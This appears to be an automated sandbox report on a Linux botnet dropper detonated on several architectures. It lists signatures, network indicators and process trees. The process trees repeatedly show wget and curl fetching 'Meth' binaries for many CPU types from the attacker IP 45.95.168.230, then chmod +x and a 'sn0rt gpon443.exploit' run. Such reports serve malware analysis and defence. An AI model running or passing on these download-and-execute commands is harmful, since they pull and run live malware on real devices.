Analysis Overview
SHA256
d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f
Threat Level: Shows suspicious behavior
The file 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 was classified as: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-28 03:58
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
debian9-mipsel-20240729-en
Max time kernel
77s
Max time network
78s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A | 13 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-u6L9cq]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto | Count |
| HR | 45.95.168.230:80 | | tcp | 26 |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
79s
Max time network
128s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9 systemd-private-e2303c266ec2474f9179c619072bd956-systemd-timedated.service-k9Z79W]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 config-err-GvQjsb netplan_dhxygxhm sn0rt snap-private-tmp ssh-VtpJT0ft9rb9 systemd-private-e2303c266ec2474f9179c619072bd956-bolt.service-A0hPlz systemd-private-e2303c266ec2474f9179c619072bd956-colord.service-4MsMwE systemd-private-e2303c266ec2474f9179c619072bd956-ModemManager.service-OngOPW systemd-private-e2303c266ec2474f9179c619072bd956-systemd-resolved.service-sByXM9]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto | Count |
| GB | 185.125.188.62:443 | | tcp | 2 |
| US | 151.101.193.91:443 | | tcp | 2 |
| HR | 45.95.168.230:80 | | tcp | 26 |
| N/A | 224.0.0.251:5353 | | udp | 1 |
| GB | 89.187.167.38:443 | | tcp | 1 |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
debian9-armhf-20240729-en
Max time kernel
78s
Max time network
79s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A | 13 |
Checks CPU configuration
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A | 13 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A | 13 |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k]
/bin/cat
[cat Meth.m68k]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc]
/bin/cat
[cat Meth.spc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i686]
/bin/cat
[cat Meth.i686]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh4]
/bin/cat
[cat Meth.sh4]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc]
/bin/cat
[cat Meth.arc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
Network
| Country | Destination | Domain | Proto | Count |
| HR | 45.95.168.230:80 | | tcp | 26 |
Files
memory/685-1-0xb672b000-0xb673c044-memory.dmp
memory/724-2-0xb6725000-0xb6736044-memory.dmp
memory/738-3-0xb676b000-0xb677c044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-28 03:58
Reported
2024-07-29 11:33
Platform
debian9-mipsbe-20240729-en
Max time kernel
79s
Max time network
80s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target | Count |
| N/A | /tmp/sn0rt | /tmp/sn0rt | N/A | 13 |
Reads runtime system information
| Description | Indicator | Process | Target | Count |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A | 13 |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/sn0rt | /tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118 | N/A |
Processes
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118
[/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x86]
/bin/cat
[cat Meth.x86]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips]
/bin/cat
[cat Meth.mips]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl]
/bin/cat
[cat Meth.mpsl]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm]
/bin/cat
[cat Meth.arm]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-07nN0C]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm5]
/bin/cat
[cat Meth.arm5]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm6]
/bin/cat
[cat Meth.arm6]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm7]
/bin/cat
[cat Meth.arm7]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
[wget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/usr/bin/curl
[curl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc]
/bin/cat
[cat Meth.ppc]
/bin/chmod
[chmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt]
/tmp/sn0rt
[./sn0rt gpon443.exploit]
/usr/bin/wget
